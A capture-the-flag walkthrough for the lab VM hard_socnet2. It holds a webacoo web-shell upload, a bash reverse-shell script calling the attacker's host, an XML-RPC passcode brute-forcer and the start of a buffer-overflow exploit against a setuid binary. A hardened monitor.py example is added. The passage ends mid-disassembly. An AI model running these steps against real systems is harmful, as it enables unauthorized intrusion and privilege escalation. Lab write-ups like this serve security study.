Target machine: hard_socnet2

Preparation

Walkthrough

Discovering the target

Discovery is done with arp-scan combined with nmap.

  • Run sudo arp-scan -l -I eth1 to find the target IP: 192.168.56.114

    ┌──(kali㉿kali)-[~]
    └─$ sudo arp-scan -l -I eth1
    Interface: eth1, type: EN10MB, MAC: 08:00:27:ad:7a:24, IPv4: 192.168.56.111
    Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
    192.168.56.1 0a:00:27:00:00:0d (Unknown: locally administered)
    192.168.56.100 08:00:27:d3:0c:de PCS Systemtechnik GmbH
    192.168.56.114 08:00:27:c4:b2:37 PCS Systemtechnik GmbH
    • 192.168.56.1 is the gateway
    • 192.168.56.100 is the DHCP server
  • A quick scan with nmap -A -T4 192.168.56.114 finds three open ports

    ┌──(kali㉿kali)-[~]
    └─$ nmap -A -T4 192.168.56.114
    Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-06 13:15 CST
    Nmap scan report for 192.168.56.114
    Host is up (0.0014s latency).
    Not shown: 997 closed tcp ports (conn-refused)
    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    | 2048 e5d34e54fe663ef3b2a54b519f5ff9c6 (RSA)
    | 256 de86ef769363748300b1a3b8c24c8f58 (ECDSA)
    |_ 256 b5ecf11e9a5a5cd7023a9e1bf7c8b453 (ED25519)
    80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    | http-cookie-flags:
    | /:
    | PHPSESSID:
    |_ httponly flag not set
    |_http-title: Social Network
    8000/tcp open http BaseHTTPServer 0.3 (Python 2.7.15rc1)
    |_http-server-header: BaseHTTP/0.3 Python/2.7.15rc1
    |_xmlrpc-methods: XMLRPC instance doesn't support introspection.
    |_http-title: Error response
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 8.71 seconds
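    • 22/tcp is the SSH service, running OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)

    • 80/tcp is an HTTP service, running Apache/2.4.29 (Ubuntu)

    • 8000/tcp is an HTTP service, running BaseHTTPServer 0.3 (Python 2.7.15rc1)

      • BaseHTTPServer is an HTTP server module; it defines two classes for implementing HTTP servers
      • According to the scan results, this port cannot be browsed properly

Initial attack

Based on the scan results, 80/tcp is the more likely way in. Opening http://192.168.56.114:80/ in Firefox shows a login page: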

<!DOCTYPE html>
<html>
<head>
<title>Social Network</title>
<link rel="stylesheet" type="text/css" href="resources/css/main.css">
<style>
.container{
margin: 40px auto;
width: 400px;
}
.content {
padding: 30px;
background-color: white;
box-shadow: 0 0 5px #4267b2;
}
</style>
</head>
<body>
<h1>Welcome to Pynch</h1>
<div class="container">
<div class="tab">
<button class="tablink active" onclick="openTab(event,'signin')" id="link1">Login</button>
<button class="tablink" onclick="openTab(event,'signup')" id="link2">Sign Up</button>
</div>
<div class="content">
<div class="tabcontent" id="signin">
<form method="post" onsubmit="return validateLogin()">
<label>Email<span>*</span></label><br>
<input type="text" name="useremail" id="loginuseremail">
<div class="required"></div>
<br>
<label>Password<span>*</span></label><br>
<input type="password" name="userpass" id="loginuserpass">
<div class="required"></div>
<br><br>
<input type="submit" value="Login" name="login">
</form>
</div>
<div class="tabcontent" id="signup">
<form method="post" onsubmit="return validateRegister()">
<!--Package One-->
<h2>Highly Required Information</h2>
<hr>
<!--First Name-->
<label>First Name<span>*</span></label><br>
<input type="text" name="userfirstname" id="userfirstname">
<div class="required"></div>
<br>
<!--Last Name-->
<label>Last Name<span>*</span></label><br>
<input type="text" name="userlastname" id="userlastname">
<div class="required"></div>
<br>
<!--Nickname-->
<label>Nickname</label><br>
<input type="text" name="usernickname" id="usernickname">
<div class="required"></div>
<br>
<!--Password-->
<label>Password<span>*</span></label><br>
<input type="password" name="userpass" id="userpass">
<div class="required"></div>
<br>
<!--Confirm Password-->
<label>Confirm Password<span>*</span></label><br>
<input type="password" name="userpassconfirm" id="userpassconfirm">
<div class="required"></div>
<br>
<!--Email-->
<label>Email<span>*</span></label><br>
<input type="text" name="useremail" id="useremail">
<div class="required"></div>
<br>
<!--Birth Date-->
Birth Date<span>*</span><br>
<select name="selectday">
<option value="1">1</option><option value="2">2</option><option value="3">3</option><option value="4">4</option><option value="5">5</option><option value="6">6</option><option value="7">7</option><option value="8">8</option><option value="9">9</option><option value="10">10</option><option value="11">11</option><option value="12">12</option><option value="13">13</option><option value="14">14</option><option value="15">15</option><option value="16">16</option><option value="17">17</option><option value="18">18</option><option value="19">19</option><option value="20">20</option><option value="21">21</option><option value="22">22</option><option value="23">23</option><option value="24">24</option><option value="25">25</option><option value="26">26</option><option value="27">27</option><option value="28">28</option><option value="29">29</option><option value="30">30</option><option value="31">31</option> </select>
<select name="selectmonth">
<option value="1">January</option><option value="2">February</option><option value="3">March</option><option value="4">April</option><option value="5">May</option><option value="6">June</option><option value="7">July</option><option value="8">August</option><option value="9">September</option><option value="10">October</option><option value="11">Novemeber</option><option value="12">December</option> </select>
<select name="selectyear">
<option value="2017">2017</option><option value="2016">2016</option><option value="2015">2015</option><option value="2014">2014</option><option value="2013">2013</option><option value="2012">2012</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option><option value="2003">2003</option><option value="2002">2002</option><option value="2001">2001</option><option value="2000">2000</option><option value="1999">1999</option><option value="1998">1998</option><option value="1997">1997</option><option value="1996" selected>1996</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option 
value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913">1913</option><option value="1912">1912</option><option value="1911">1911</option><option value="1910">1910</option><option value="1909">1909</option><option value="1908">1908</option><option value="1907">1907</option><option value="1906">1906</option><option value="1905">1905</option><option value="1904">1904</option><option value="1903">1903</option><option 
value="1902">1902</option><option value="1901">1901</option><option value="1900">1900</option> </select>
<br><br>
<!--Gender-->
<input type="radio" name="usergender" value="M" id="malegender" class="usergender">
<label>Male</label>
<input type="radio" name="usergender" value="F" id="femalegender" class="usergender">
<label>Female</label>
<div class="required"></div>
<br>
<!--Hometown-->
<label>Hometown</label><br>
<input type="text" name="userhometown" id="userhometown">
<br>
<!--Package Two-->
<h2>Additional Information</h2>
<hr>
<!--Marital Status-->
<input type="radio" name="userstatus" value="S" id="singlestatus">
<label>Single</label>
<input type="radio" name="userstatus" value="E" id="engagedstatus">
<label>Engaged</label>
<input type="radio" name="userstatus" value="M" id="marriedstatus">
<label>Married</label>
<br><br>
<!--About Me-->
<label>About Me</label><br>
<textarea rows="12" name="userabout" id="userabout"></textarea>
<br><br>
<input type="submit" value="Create Account" name="register">
</form>
</div>
</div>
</div>
<script src="resources/js/main.js"></script>
</body>
</html>
  • Looking at the form, there is no particularly good way to attack the login itself, so we register an account and log in

  • After logging in, the chat area shows a message from the admin account

    Hello friends! I have been working on a new script for monitoring servers. It is called monitor.py. I am running it on this server. I will release it soon!

The chat area accepts image uploads, and we use webacoo to get in through it

  • Create the backdoor: webacoo -g -o exp.php
  • Upload exp.php in the chat area by posting a message, then copy the location of the uploaded image
  • Run webacoo -t -u http://192.168.56.114/data/images/posts/11.php

    ┌──(kali㉿kali)-[~/workspace]
    └─$ webacoo -t -u http://192.168.56.114/data/images/posts/11.php
    WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit
    Copyright (C) 2011-2012 Anestis Bechtsoudis
    { @anestisb | anestis@bechtsoudis.com | http(s)://bechtsoudis.com }
    [+] Connecting to remote server as...
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    [*] Type 'load' to use an extension module.
    [*] Type ':<cmd>' to run local OS commands.
    [*] Type 'exit' to quit terminal.
    webacoo$ ls
    10.php
    11.php
    4.png
    5.png
    6.png
  • Check the kernel version

    webacoo$ uname -a
    Linux socnet2 4.15.0-38-generic #41-Ubuntu SMP Wed Oct 10 10:59:38 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

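CVE-2021-3493 could be used here to compromise the machine directly, but we will not use it

A more stable shell

The current shell is limited in what it can do, so we wrap a reverse shell in a script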

#!/bin/bash
bash -i >& /dev/tcp/192.168.56.111/4444 0>&1
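  • Upload this script, either through the chat area or by serving it from a python3 HTTP server, and use the webacoo shell to make the uploaded script executable
  • Start a listener on port 4444 on Kali, then run the uploaded script from the webacoo shell

Improving the shell further

  • In the new shell, run python -c "import pty; pty.spawn('/bin/bash')" to make it more interactive

Privilege escalation from www-data

Information gathering

  • View /etc/passwd with cat /etc/passwd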

    www-data@socnet2:/var/www/html/data/images/posts$ cat /etc/passwd
    cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
    systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
    syslog:x:102:106::/home/syslog:/usr/sbin/nologin
    messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
    _apt:x:104:65534::/nonexistent:/usr/sbin/nologin
    lxd:x:105:65534::/var/lib/lxd/:/bin/false
    uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
    dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
    landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
    pollinate:x:109:1::/var/cache/pollinate:/bin/false
    sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
    socnet:x:1000:1000:socnet2:/home/socnet:/bin/bash
    mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false
    • This reveals the user socnet
  • Go to /home/socnet to confirm this and look around

    www-data@socnet2:/var/www/html/data/images/posts$ cd /home/socnet
    cd /home/socnet
    www-data@socnet2:/home/socnet$ ls -alh
    ls -alh
    total 60K
    drwxr-xr-x 6 socnet socnet 4.0K Oct 29 2018 .
    drwxr-xr-x 3 root root 4.0K Oct 29 2018 ..
    -rw-r--r-- 1 socnet socnet 3.7K Apr 4 2018 .bashrc
    drwx------ 2 socnet socnet 4.0K Oct 29 2018 .cache
    -rw------- 1 socnet socnet 1.1K Oct 29 2018 .gdb_history
    -rw-rw-r-- 1 socnet socnet 22 Oct 29 2018 .gdbinit
    drwx------ 3 socnet socnet 4.0K Oct 29 2018 .gnupg
    drwxrwxr-x 3 socnet socnet 4.0K Oct 29 2018 .local
    -rw------- 1 socnet socnet 579 Oct 29 2018 .mysql_history
    -rw-r--r-- 1 socnet socnet 807 Apr 4 2018 .profile
    -rw-rw-r-- 1 socnet socnet 66 Oct 29 2018 .selected_editor
    -rw-r--r-- 1 socnet socnet 0 Oct 29 2018 .sudo_as_admin_successful
    -rwsrwsr-x 1 root socnet 6.8K Oct 29 2018 add_record
    -rw-rw-r-- 1 socnet socnet 904 Oct 29 2018 monitor.py
    drwxrwxr-x 4 socnet socnet 4.0K Oct 29 2018 peda
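    • Note the s bits in the permissions of add_record; with the current privileges we cannot do anything with it yet
    • Note that monitor.py is the script admin mentioned in the chat area earlier
    • peda is used for dynamic debugging, so we can guess that some disassembly will be needed
  • View monitor.py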

    #my remote server management API
    import SimpleXMLRPCServer
    import subprocess
    import random

    debugging_pass = random.randint(1000,9999)

    def runcmd(cmd):
        results = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        output = results.stdout.read() + results.stderr.read()
        return output

    def cpu():
        return runcmd("cat /proc/cpuinfo")

    def mem():
        return runcmd("free -m")

    def disk():
        return runcmd("df -h")

    def net():
        return runcmd("ip a")

    def secure_cmd(cmd,passcode):
        if passcode==debugging_pass:
            return runcmd(cmd)
        else:
            return "Wrong passcode."

    server = SimpleXMLRPCServer.SimpleXMLRPCServer(("0.0.0.0", 8000))
    server.register_function(cpu)
    server.register_function(mem)
    server.register_function(disk)
    server.register_function(net)
    server.register_function(secure_cmd)

    server.serve_forever()

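Attempting an attack through monitor.py

  • Write a script to test access

    import xmlrpc.client

    # Call the unauthenticated cpu() method exposed by monitor.py on port 8000
    with xmlrpc.client.ServerProxy("http://192.168.56.114:8000/") as proxy:
        print(str(proxy.cpu()))
    • The test succeeds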
    ┌──(kali㉿kali)-[~]
    └─$ python3 client.py
    processor : 0
    vendor_id : GenuineIntel
    cpu family : 6
    model : 122
    model name : Intel(R) Celeron(R) J4125 CPU @ 2.00GHz
    stepping : 8
    cpu MHz : 1996.797
    cache size : 4096 KB
    physical id : 0
    siblings : 1
    core id : 0
    cpu cores : 1
    apicid : 0
    initial apicid : 0
    fpu : yes
    fpu_exception : yes
    cpuid level : 22
    wp : yes
    flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid pni pclmulqdq monitor ssse3 cx16 sse4_1 sse4_2 x2apic movbe popcnt aes xsave rdrand hypervisor lahf_lm 3dnowprefetch fsgsbase rdseed clflushopt arch_capabilities
    bugs : spectre_v1 spectre_v2 spec_store_bypass
    bogomips : 3993.59
    clflush size : 64
    cache_alignment : 64
    address sizes : 39 bits physical, 48 bits virtual
    power management:
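  • Adjust the script

    import xmlrpc.client

    # Try every four-digit passcode until secure_cmd stops answering "Wrong passcode."
    with xmlrpc.client.ServerProxy("http://192.168.56.114:8000/") as proxy:
        for i in range(1000, 10000):
            if "Wrong" not in str(proxy.secure_cmd('whoami', i)):
                print(i)
                break

    Result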

    ┌──(kali㉿kali)-[~]
    └─$ python3 client.py
    4712
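
The loop above succeeds because monitor.py draws a four-digit passcode (9,000 possibilities), never limits failed attempts, hands the caller's string to a shell, and listens on 0.0.0.0. The following hardened variant in Python 3 is an added example, not code from the target or from the original write-up; GuardedMonitor, run_diagnostic, DIAGNOSTICS and the injectable clock and runner are names assumed here for illustration.

```python
# Added example (not from the target): a hardened take on monitor.py's design.
import hmac
import secrets
import subprocess
import sys
import time
from xmlrpc.server import SimpleXMLRPCServer

DENIED = "Access denied."

# Fixed argv lists: callers pick a name, never the command text, and no shell runs.
DIAGNOSTICS = {
    "cpu": ["cat", "/proc/cpuinfo"],
    "mem": ["free", "-m"],
    "disk": ["df", "-h"],
    "net": ["ip", "a"],
}


def run_argv(argv):
    """Run one allowlisted command without a shell and return its combined output."""
    done = subprocess.run(argv, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
                          timeout=10, check=False)
    return done.stdout.decode(errors="replace")


class GuardedMonitor:
    """Hypothetical replacement for secure_cmd(): long random token plus lockout."""

    def __init__(self, max_failures=5, lockout_seconds=300,
                 clock=time.monotonic, runner=run_argv):
        # 256 bits from the OS CSPRNG instead of random.randint(1000, 9999).
        self.token = secrets.token_urlsafe(32)
        self._max_failures = max_failures
        self._lockout = lockout_seconds
        self._clock = clock
        self._runner = runner
        self._failures = 0
        self._locked_until = 0.0

    def _authorized(self, presented):
        now = self._clock()
        if now < self._locked_until:
            return False  # locked: refuse without comparing anything
        # Constant-time comparison; str() also copes with the integer guesses
        # an XML-RPC client may send.
        ok = hmac.compare_digest(str(presented).encode(), self.token.encode())
        if ok:
            self._failures = 0
            return True
        self._failures += 1
        if self._failures >= self._max_failures:
            # Global lockout: simple, at the cost of also locking out the operator.
            self._locked_until = now + self._lockout
            self._failures = 0
        return False

    def run_diagnostic(self, name, token):
        if not self._authorized(token):
            return DENIED
        argv = DIAGNOSTICS.get(name) if isinstance(name, str) else None
        if argv is None:
            return "Unknown diagnostic."
        return self._runner(argv)


if __name__ == "__main__":
    monitor = GuardedMonitor()
    print("operator token:", monitor.token, file=sys.stderr)
    # Loopback only; remote operators reach it through an authenticated tunnel such as SSH.
    server = SimpleXMLRPCServer(("127.0.0.1", 8000), logRequests=True)
    server.register_function(monitor.run_diagnostic)
    server.serve_forever()
```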

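Use the reverse-shell script from the "A more stable shell" step to get a new reverse shell

import xmlrpc.client

# Run the previously uploaded script through secure_cmd with the recovered passcode
with xmlrpc.client.ServerProxy("http://192.168.56.114:8000/") as proxy:
    str(proxy.secure_cmd('/var/www/html/data/images/posts/exp.sh', 4712))
  • The result is a shell running as the socnet user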

    connect to [192.168.56.111] from (UNKNOWN) [192.168.56.114] 41584
    bash: cannot set terminal process group (730): Inappropriate ioctl for device
    bash: no job control in this shell
    socnet@socnet2:~$
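  • Run python -c "import pty; pty.spawn('/bin/bash')" to make the shell more interactive again

Second privilege escalation

Now that we have escalated to the socnet user, we have permission to work with add_record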

socnet@socnet2:~$ ls -hl
ls -hl
total 16K
-rwsrwsr-x 1 root socnet 6.8K Oct 29 2018 add_record
-rw-rw-r-- 1 socnet socnet 904 Oct 29 2018 monitor.py
drwxrwxr-x 4 socnet socnet 4.0K Oct 29 2018 peda
socnet@socnet2:~$ file add_record
file add_record
add_record: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=e3fa9a66b0b1e3281ae09b3fb1b7b82ff17972d8, not stripped
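  • Running add_record shows that it is a program for adding employee records
  • The program is a 32-bit ELF, dynamically linked, with interpreter /lib/ld-linux.so.2

Here we debug add_record with gdb, using the command gdb -q ./add_record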

```bash
socnet@socnet2:~$ gdb -q ./add_record
gdb -q ./add_record
Reading symbols from ./add_record...(no debugging symbols found)...done.
gdb-peda$
```
  • Start the program with r and give it overly long input to see whether a memory overflow exists

    gdb-peda$ r
    r
    Starting program: /home/socnet/add_record
    Welcome to Add Record application
    Use it to add info about Social Network 2.0 Employees
    Employee Name(char): aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    Years worked(int): Salary(int): Ever got in trouble? 1 (yes) or 0 (no): Employee data you've entered:
    Name aaaaaaaaaaaaaaaaaaaaaaaa
    Years -136196023, Salary -8468, Trouble 8, Comments NA
    [Inferior 1 (process 17038) exited normally]
    Warning: not running or target is remote
    • Inferior 1 (process 17038) exited normally means there is no memory overflow at this input; keep probing the remaining input points
  • The memory overflow is at the Explain: input

    gdb-peda$ r
    r
    Starting program: /home/socnet/add_record
    Welcome to Add Record application
    Use it to add info about Social Network 2.0 Employees
    Employee Name(char): aa
    aa
    Years worked(int): 11
    11
    Salary(int): 1
    1
    Ever got in trouble? 1 (yes) or 0 (no): 1
    1
    Explain: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    Program received signal SIGSEGV, Segmentation fault.
    [----------------------------------registers-----------------------------------]
    EAX: 0xffffdc1e ('a' <repeats 102 times>)
    EBX: 0x61616161 ('aaaa')
    ECX: 0xffffdce0 --> 0x6161 ('aa')
    EDX: 0xffffdc82 --> 0x61006161 ('aa')
    ESI: 0xf7fc2000 --> 0x1d4d6c
    EDI: 0xffffdce0 --> 0x6161 ('aa')
    EBP: 0x61616161 ('aaaa')
    ESP: 0xffffdc60 ('a' <repeats 36 times>)
    EIP: 0x61616161 ('aaaa')
    EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
    [-------------------------------------code-------------------------------------]
    Invalid $PC address: 0x61616161
    [------------------------------------stack-------------------------------------]
    0000| 0xffffdc60 ('a' <repeats 36 times>)
    0004| 0xffffdc64 ('a' <repeats 32 times>)
    0008| 0xffffdc68 ('a' <repeats 28 times>)
    0012| 0xffffdc6c ('a' <repeats 24 times>)
    0016| 0xffffdc70 ('a' <repeats 20 times>)
    0020| 0xffffdc74 ('a' <repeats 16 times>)
    0024| 0xffffdc78 ('a' <repeats 12 times>)
    0028| 0xffffdc7c ("aaaaaaaa")
    [------------------------------------------------------------------------------]
    Legend: code, data, rodata, value
    Stopped reason: SIGSEGV
    0x61616161 in ?? ()
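    • Pay particular attention to the state of the EIP register
  • Use pattern create 100 to generate a 100-character string with no repeated sequences, and use it to locate the critical offset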

    gdb-peda$ pattern create 100
    pattern create 100
    'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
    gdb-peda$ r
    r
    Starting program: /home/socnet/add_record
    Welcome to Add Record application
    Use it to add info about Social Network 2.0 Employees
    Employee Name(char): aa
    aa
    Years worked(int): 111
    111
    Salary(int): 1
    1
    Ever got in trouble? 1 (yes) or 0 (no): 1
    1
    Explain: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL
    AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL
    Program received signal SIGSEGV, Segmentation fault.
    [----------------------------------registers-----------------------------------]
    EAX: 0xffffdc1e ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
    EBX: 0x63414147 ('GAAc')
    ECX: 0xffffdce0 --> 0x0
    EDX: 0xffffdc82 --> 0x42414100 ('')
    ESI: 0xf7fc2000 --> 0x1d4d6c
    EDI: 0xffffdce0 --> 0x0
    EBP: 0x41324141 ('AA2A')
    ESP: 0xffffdc60 ("dAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
    EIP: 0x41414841 ('AHAA')
    EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
    [-------------------------------------code-------------------------------------]
    Invalid $PC address: 0x41414841
    [------------------------------------stack-------------------------------------]
    0000| 0xffffdc60 ("dAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
    0004| 0xffffdc64 ("AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
    0008| 0xffffdc68 ("AeAA4AAJAAfAA5AAKAAgAA6AAL")
    0012| 0xffffdc6c ("4AAJAAfAA5AAKAAgAA6AAL")
    0016| 0xffffdc70 ("AAfAA5AAKAAgAA6AAL")
    0020| 0xffffdc74 ("A5AAKAAgAA6AAL")
    0024| 0xffffdc78 ("KAAgAA6AAL")
    0028| 0xffffdc7c ("AA6AAL")
    [------------------------------------------------------------------------------]
    Legend: code, data, rodata, value
    Stopped reason: SIGSEGV
    0x41414841 in ?? ()
    • Look for the EIP value AHAA in the string AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL
    • Use grep to confirm the position: echo 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL' | grep 'AHAA'
    • Critical length: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAA, whose last four characters control the EIP register

Now we need to decide what to inject

  • Use disas main to view the assembly code

    0x080486d8 <+0>:     lea    ecx,[esp+0x4]
    0x080486dc <+4>: and esp,0xfffffff0
    0x080486df <+7>: push DWORD PTR [ecx-0x4]
    0x080486e2 <+10>: push ebp
    0x080486e3 <+11>: mov ebp,esp
    0x080486e5 <+13>: push edi
    0x080486e6 <+14>: push esi
    0x080486e7 <+15>: push ebx
    0x080486e8 <+16>: push ecx
    0x080486e9 <+17>: sub esp,0xa8
    0x080486ef <+23>: call 0x80485b0 <__x86.get_pc_thunk.bx>
    0x080486f4 <+28>: add ebx,0x1654
    0x080486fa <+34>: mov DWORD PTR [ebp-0xac],0x414e
    0x08048704 <+44>: lea edx,[ebp-0xa8]
    0x0804870a <+50>: mov eax,0x0
    0x0804870f <+55>: mov ecx,0x18
    0x08048714 <+60>: mov edi,edx
    0x08048716 <+62>: rep stos DWORD PTR es:[edi],eax
    0x08048718 <+64>: sub esp,0x8
    0x0804871b <+67>: lea eax,[ebx-0x13ee]
    0x08048721 <+73>: push eax
    0x08048722 <+74>: lea eax,[ebx-0x13ec]
    0x08048728 <+80>: push eax
    0x08048729 <+81>: call 0x8048520 <fopen@plt>
    0x0804872e <+86>: add esp,0x10
    0x08048731 <+89>: mov DWORD PTR [ebp-0x1c],eax
    0x08048734 <+92>: sub esp,0xc
    0x08048737 <+95>: lea eax,[ebx-0x13d4]
    0x0804873d <+101>: push eax
    0x0804873e <+102>: call 0x80484e0 <puts@plt>
    0x08048743 <+107>: add esp,0x10
    0x08048746 <+110>: sub esp,0xc
    0x08048749 <+113>: lea eax,[ebx-0x137c]
    0x0804874f <+119>: push eax
    0x08048750 <+120>: call 0x8048480 <printf@plt>
    0x08048755 <+125>: add esp,0x10
    0x08048758 <+128>: mov eax,DWORD PTR [ebx-0x4]
    0x0804875e <+134>: mov eax,DWORD PTR [eax]
    0x08048760 <+136>: sub esp,0x4
    0x08048763 <+139>: push eax
    0x08048764 <+140>: push 0x19
    0x08048766 <+142>: lea eax,[ebp-0x39]
    0x08048769 <+145>: push eax
    0x0804876a <+146>: call 0x80484b0 <fgets@plt>
    0x0804876f <+151>: add esp,0x10
    0x08048772 <+154>: sub esp,0xc
    0x08048775 <+157>: lea eax,[ebx-0x1366]
    0x0804877b <+163>: push eax
    0x0804877c <+164>: call 0x8048480 <printf@plt>
    0x08048781 <+169>: add esp,0x10
    0x08048784 <+172>: sub esp,0x8
    0x08048787 <+175>: lea eax,[ebp-0x40]
    0x0804878a <+178>: push eax
    0x0804878b <+179>: lea eax,[ebx-0x1352]
    0x08048791 <+185>: push eax
    0x08048792 <+186>: call 0x8048540 <__isoc99_scanf@plt>
    0x08048797 <+191>: add esp,0x10
    0x0804879a <+194>: sub esp,0xc
    0x0804879d <+197>: lea eax,[ebx-0x134f]
    0x080487a3 <+203>: push eax
    0x080487a4 <+204>: call 0x8048480 <printf@plt>
    0x080487a9 <+209>: add esp,0x10
    0x080487ac <+212>: sub esp,0x8
    0x080487af <+215>: lea eax,[ebp-0x44]
    0x080487b2 <+218>: push eax
    0x080487b3 <+219>: lea eax,[ebx-0x1352]
    0x080487b9 <+225>: push eax
    0x080487ba <+226>: call 0x8048540 <__isoc99_scanf@plt>
    0x080487bf <+231>: add esp,0x10
